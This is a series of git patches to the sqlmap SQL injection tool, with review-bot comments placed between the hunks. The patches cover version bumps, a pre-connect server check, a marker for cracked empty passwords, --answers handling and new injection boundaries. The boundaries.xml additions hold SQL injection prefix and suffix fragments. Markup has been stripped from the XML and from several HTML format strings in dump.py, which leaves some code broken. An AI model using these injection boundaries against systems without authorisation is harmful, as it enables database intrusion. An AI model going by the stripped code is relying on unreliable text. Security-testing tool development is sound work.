kb.singleLogFlags = set() kb.skipSeqMatcher = False kb.reduceTests = None diff --git a/lib/core/settings.py b/lib/core/settings.py index bdac7948476..f39fd3a68db 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.0" +VERSION = "1.2.9.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
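Review bot: The new warning in the checks.py hunk interpolates `kb.serverHeader` verbatim, and the Server header is chosen by the remote host, so newlines, terminal control sequences or an arbitrarily long value reach sqlmap's log and console unfiltered. Since only the match matters, log the matched token rather than the raw header: `incompatible = next((_ for _ in PRECONNECT_INCOMPATIBLE_SERVERS if _ in (kb.serverHeader or "")), None)` / `if incompatible:` / `singleTimeWarnMessage("turning off pre-connect mechanism because of incompatible server ('%s')" % incompatible)`, or pass the value through the project's usual string-sanitising helper before logging. The substring match is case-sensitive, which is fine for the single `"SimpleHTTP"` entry but worth a comment if the tuple grows. checkConnection's body starts above the hunk.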
@@ -97,6 +97,9 @@ # Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it) PRECONNECT_CANDIDATE_TIMEOUT = 10 +# Servers known to cause issue with pre-connection mechanism (because of lack of multi-threaded support) +PRECONNECT_INCOMPATIBLE_SERVERS = ("SimpleHTTP",) + # Maximum sleep time in "Murphy" (testing) mode MAX_MURPHY_SLEEP_TIME = 3 diff --git a/lib/request/connect.py b/lib/request/connect.py index 5a3a267d9c3..1bcc2c1a43c 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -493,6 +493,7 @@ class _(dict): code = (code or conn.code) if conn.code == kb.originalCode else conn.code # do not override redirection code (for comparison purposes) responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() + kb.serverHeader = responseHeaders.get(HTTP_HEADER.SERVER, kb.serverHeader) else: code = None responseHeaders = {} diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 65e05f8f69e..d37dc4a3cc9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py 0142de525def5e3f17092dcc1ed67c95 extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -7493c782345a60f6c00c9281d51a494e lib/controller/checks.py +2058987606ad75435c69d28cab11ef9e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 
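Review bot: The new `kb.serverHeader = responseHeaders.get(HTTP_HEADER.SERVER, kb.serverHeader)` in the connect.py hunk is overwritten by every response that carries a Server header, so by the time checkConnection reads it the value reflects whichever response came last — after a redirect to another host, or a proxy or error page, that may not be the target server the pre-connect decision is about. If that is intended, a short comment on the line such as `# last Server header seen; checkConnection() uses it to disable pre-connect on known-problematic servers` documents the coupling; otherwise record it only for responses from the original target. The enclosing function starts above the hunk.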
@@ -43,14 +43,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -6826030069e1cd88eb87603a50b2d251 lib/core/option.py +62fb1b8e7a82c726eb9631daac4c82e9 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bdb6b2b1b842c4f5e2874fe3a199f648 lib/core/settings.py +153ad66f2a6789909f4a4702650397dc lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -72,7 +72,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -e284905d23658b85e94a5dd37bfb80b2 lib/request/connect.py +4ac4e1d10210bb1bc3d64a3532c5ff8b lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From f125f64a809aece1528b35835161000ee9ebc62d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 4 Sep 2018 23:14:25 +0200 Subject: [PATCH 259/428] Minor style update (marker for empty cracked password) --- lib/core/settings.py | 5 ++++- lib/utils/hash.py | 3 ++- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f39fd3a68db..8ba1f177484 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.1" +VERSION = "1.2.9.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -429,6 +429,9 @@ # Display hash attack info every mod number of items HASH_MOD_ITEM_DISPLAY = 11 +# Display marker for (cracked) empty password +HASH_EMPTY_PASSWORD_MARKER = "" + # Maximum integer value MAX_INT = sys.maxint diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 4b4e194fb2c..05cd2a817c4 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -75,6 +75,7 @@ from lib.core.settings import COMMON_USER_COLUMNS from lib.core.settings import DEV_EMAIL_ADDRESS from lib.core.settings import DUMMY_USER_PREFIX +from lib.core.settings import HASH_EMPTY_PASSWORD_MARKER from lib.core.settings import HASH_MOD_ITEM_DISPLAY from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD from lib.core.settings import IS_WIN @@ -684,7 +685,7 @@ def attackDumpedTable(): value = table[column]['values'][i] if value and value.lower() in lut: - table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()])) + table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()] or HASH_EMPTY_PASSWORD_MARKER)) table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i])) def hashRecognition(value): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d37dc4a3cc9..30b66628c2f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
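Review bot: As shown in the settings.py hunk, `HASH_EMPTY_PASSWORD_MARKER = ""`, which makes the new `lut[value.lower()] or HASH_EMPTY_PASSWORD_MARKER` in the hash.py hunk a no-op — an empty cracked password still renders as `()`, the very thing the commit sets out to mark. The constant's comment calls it a display marker, so the intended value was presumably a visible token that this rendering of the patch has lost (an angle-bracketed word would be stripped by an HTML pipeline); confirm that the committed value is non-empty. attackDumpedTable's body starts above the hunk.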
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -153ad66f2a6789909f4a4702650397dc lib/core/settings.py +5e2fea9a1e0cc3d12578dbcf079dba67 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -109,7 +109,7 @@ f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py -05dbc49838ca0454ce401ad616acf8c5 lib/utils/hash.py +d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py From fa3f3baf1eb7ae22945186993d3e9f0dc3959c97 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 4 Sep 2018 23:24:40 +0200 Subject: [PATCH 260/428] Minor update --- lib/core/dump.py | 2 ++ lib/core/settings.py | 6 +++--- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 5 deletions(-) diff --git a/lib/core/dump.py b/lib/core/dump.py index b3e876c42aa..b5d0b6c6887 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -47,6 +47,7 @@ from lib.core.settings import TRIM_STDOUT_DUMP_SIZE from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT +from lib.core.settings import VERSION_STRING from lib.core.settings import WINDOWS_RESERVED_NAMES from thirdparty.magic import magic 
@@ -532,6 +533,7 @@ def dbTableValues(self, tableValues): elif conf.dumpFormat == DUMP_FORMAT.HTML: dataToDumpFile(dumpFP, "\n\n\n") dataToDumpFile(dumpFP, "\n" % UNICODE_ENCODING) + dataToDumpFile(dumpFP, "\n" % VERSION_STRING) dataToDumpFile(dumpFP, "%s\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table))) dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE) dataToDumpFile(dumpFP, "\n\n\n\n\n\n") diff --git a/lib/core/settings.py b/lib/core/settings.py index 8ba1f177484..a8fff133469 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.2" +VERSION = "1.2.9.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -792,9 +792,9 @@ background-color: #D3DFEE } td{ - font-size:10px; + font-size:12px; } th{ - font-size:10px; + font-size:12px; } """ diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 30b66628c2f..e8eba4243b1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -37,7 +37,7 @@ fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py db165596ef0a3e19ec59c24192bb318d lib/core/dicts.py -9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py +d4b3d448bcfd9f15d089fc81d38f4825 lib/core/dump.py ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 
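Review bot: The added `dataToDumpFile(dumpFP, ... % VERSION_STRING)` line is safe as written, because VERSION_STRING is a constant assembled in lib/core/settings.py, but the neighbouring title line in this hunk interpolates `db` and `table` into the HTML dump without escaping, and those identifiers come from the target DBMS. Since the HTML dump is meant to be opened in a browser, markup smuggled in a database or table name would land unescaped in the report; passing both through `cgi.escape(...)` (or the project's existing HTML-escaping helper) at that point closes it. dbTableValues begins outside the hunk, so I cannot see whether the names are sanitized earlier — if they are, a one-line comment saying so would spare the next reviewer the same check.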
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5e2fea9a1e0cc3d12578dbcf079dba67 lib/core/settings.py +f2ec47bbf669523c8e874eb63adf0126 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py From dbcf030743a66c264cb86c94e1145494e48dc305 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 4 Sep 2018 23:30:58 +0200 Subject: [PATCH 261/428] Accepting even dummy (e.g.) 'y' for --answers --- lib/core/common.py | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 99cce710312..5edc4f3ee3c 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1009,6 +1009,9 @@ def readInput(message, default=None, checkBatch=True, boolean=False): kb.prependFlag = False if conf.get("answers"): + if not any(_ in conf.answers for _ in ",="): + return conf.answers + for item in conf.answers.split(','): question = item.split('=')[0].strip() answer = item.split('=')[1] if len(item.split('=')) > 1 else None diff --git a/lib/core/settings.py b/lib/core/settings.py index a8fff133469..c97f3dea50f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.3" +VERSION = "1.2.9.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e8eba4243b1..d0e366a3351 100644 --- a/txt/checksum.md5 
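Review bot: The early `return conf.answers` in readInput bypasses the post-processing that the existing code applies to `retVal` after the `for` loop (outside the hunk), so a caller using `boolean=True` would presumably get the raw string back instead of a bool — and as `"n"` is truthy, `--answers=n` would then read as a yes at every prompt. Keeping the shortcut on the normal path avoids that: `retVal = conf.answers` in place of the `return`, with the existing `for item in conf.answers.split(','):` loop moved under an `else:`. A comment is also warranted, since a bare value now answers every prompt the tool asks, including the ones guarding destructive actions, which is a behavioural change for `--answers`.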
+++ b/txt/checksum.md5 @@ -30,7 +30,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -3652331fec15a31ace15d8cce4024495 lib/core/common.py +6e73b39f7c51f75ae64a652dec69ab2f lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f2ec47bbf669523c8e874eb63adf0126 lib/core/settings.py +daae048e858ee6f618e93bd0685dd1f4 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py From 95be19a692053c78da3e5a263019868517b0fedf Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 5 Sep 2018 00:15:15 +0200 Subject: [PATCH 262/428] Minor update --- lib/core/settings.py | 2 +- sqlmapapi.py | 4 ++-- txt/checksum.md5 | 10 +++++----- 3 files changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c97f3dea50f..b20c1d2d9e3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.4" +VERSION = "1.2.9.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmapapi.py b/sqlmapapi.py index c653aa3002e..14132bbdf6c 100755 --- a/sqlmapapi.py 
+++ b/sqlmapapi.py @@ -40,8 +40,8 @@ def main(): # Parse command line options apiparser = optparse.OptionParser() - apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_DEFAULT_PORT, action="store_true") - apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_DEFAULT_PORT, action="store_true") + apiparser.add_option("-s", "--server", help="Run as a REST-JSON API server", default=RESTAPI_DEFAULT_PORT, action="store_true") + apiparser.add_option("-c", "--client", help="Run as a REST-JSON API client", default=RESTAPI_DEFAULT_PORT, action="store_true") apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS, action="store") apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type="int", action="store") apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d0e366a3351..cdfd423d6d5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py +738e160412b3cb52bdeb7bc58dec91c9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py 6e73b39f7c51f75ae64a652dec69ab2f lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 
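Review bot: Both rewritten `add_option` lines keep `default=RESTAPI_DEFAULT_PORT` on options declared with `action="store_true"`, so when neither `-s` nor `-c` is passed, `options.server` and `options.client` hold a port number rather than False. Whether that is harmless depends on how main() tests them further down, which is outside the hunk, but `default=False` is what the action implies and would remove the surprise. The help-text wording change itself is fine.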
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -daae048e858ee6f618e93bd0685dd1f4 lib/core/settings.py +1e62a08b7dc32e7063ca5d981354c5fc lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -227,7 +227,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 4e6d2094bd6afe35032fb8bc8a86e83c shell/stagers/stager.aspx_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ -4eaeef94314956e4517e5310a28d579a sqlmapapi.py +cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py a35b5b83c12841fdf3925190c9d24299 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py @@ -469,8 +469,8 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -6debc049a8049b890ca109a731c60782 xml/boundaries.xml -0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml +8400e0dce3304eae2189fdff5813d7fe xml/boundaries.xml +6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml From ad5a73199927b388e313eeb3c63eb89a32156487 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 5 Sep 2018 00:16:35 +0200 Subject: [PATCH 263/428] First commit for Issue #120 --- lib/core/agent.py | 3 ++- xml/boundaries.xml | 11 +++++++++++ xml/errors.xml | 1 + 3 files changed, 14 insertions(+), 1 deletion(-) 
diff --git a/lib/core/agent.py b/lib/core/agent.py index ebdbb6e4107..63c7e485105 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -301,7 +301,8 @@ def cleanupPayload(self, payload, origValue=None): ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar), ("[HASH_REPLACE]", kb.chars.hash_), - ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT) + ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT), + ("[ORIGINAL]", origValue or "") ) payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload) diff --git a/xml/boundaries.xml b/xml/boundaries.xml index b61dcb6e0f2..cd954ebcfb8 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -488,6 +488,17 @@ Formats: + + + 4 + 1 + 1 + 1 + ` + AND `[ORIGINAL] + + + 4 diff --git a/xml/errors.xml b/xml/errors.xml index a4c95b2a526..5889f842eb9 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -9,6 +9,7 @@ + From 91c5151770fd9445770bf631d0ecedce6dadd3e9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 5 Sep 2018 00:56:39 +0200 Subject: [PATCH 264/428] Another update related to the #120 --- lib/core/agent.py | 10 ++++++---- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- xml/boundaries.xml | 9 +++++++++ 4 files changed, 19 insertions(+), 8 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 63c7e485105..1a6f9819972 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -301,8 +301,7 @@ def cleanupPayload(self, payload, origValue=None): ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar), ("[HASH_REPLACE]", kb.chars.hash_), - ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT), - ("[ORIGINAL]", origValue or "") + ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT) ) payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload) 
@@ -312,9 +311,12 @@ def cleanupPayload(self, payload, origValue=None): for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)): payload = payload.replace(_, randomStr()) - if origValue is not None and "[ORIGVALUE]" in payload: + if origValue is not None: origValue = getUnicode(origValue) - payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) + if "[ORIGVALUE]" in payload: + payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) + if "[ORIGINAL]" in payload: + payload = getUnicode(payload).replace("[ORIGINAL]", origValue) if INFERENCE_MARKER in payload: if Backend.getIdentifiedDbms() is not None: diff --git a/lib/core/settings.py b/lib/core/settings.py index b20c1d2d9e3..1a3cd30c79f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.5" +VERSION = "1.2.9.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cdfd423d6d5..abaeddb63d8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -738e160412b3cb52bdeb7bc58dec91c9 lib/core/agent.py +8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py 6e73b39f7c51f75ae64a652dec69ab2f lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 
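Review bot: `[ORIGINAL]` is substituted with `origValue` verbatim, whereas the adjacent `[ORIGVALUE]` branch quotes and escapes it, and nothing in the hunk records that the asymmetry is intentional. A comment such as `# [ORIGINAL] is the raw value, used by identifier boundaries in xml/boundaries.xml; no quoting on purpose` would keep a later maintainer from "fixing" it to match. The `getUnicode(payload)` call is repeated in both branches; computing it once above the two `if`s would be tidier. cleanupPayload starts before this hunk.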
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1e62a08b7dc32e7063ca5d981354c5fc lib/core/settings.py +24ed497dd48a34fdada54a0cb62f1161 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -469,7 +469,7 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -8400e0dce3304eae2189fdff5813d7fe xml/boundaries.xml +55216973f6846ea2b3c3da39464dbf7e xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index cd954ebcfb8..8ecfe598006 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -497,6 +497,15 @@ Formats: ` AND `[ORIGINAL] + + + 5 + 1 + 1 + 1 + "=[ORIGINAL] + AND [ORIGINAL]="[ORIGINAL] + From ac481492c0f487993b7dbb2480c80f61c0358b97 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 5 Sep 2018 23:29:52 +0200 Subject: [PATCH 265/428] Final commit for #120 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 10 ++++---- xml/boundaries.xml | 26 +++++++++++++------ xml/payloads/boolean_blind.xml | 10 ++++---- xml/payloads/error_based.xml | 46 +++++++++++++++++----------------- xml/payloads/time_blind.xml | 14 +++++------ 6 files changed, 59 insertions(+), 49 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1a3cd30c79f..d3ce650b61c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.9.6"
+VERSION = "1.2.9.7"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index abaeddb63d8..1ae853c3ba3 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
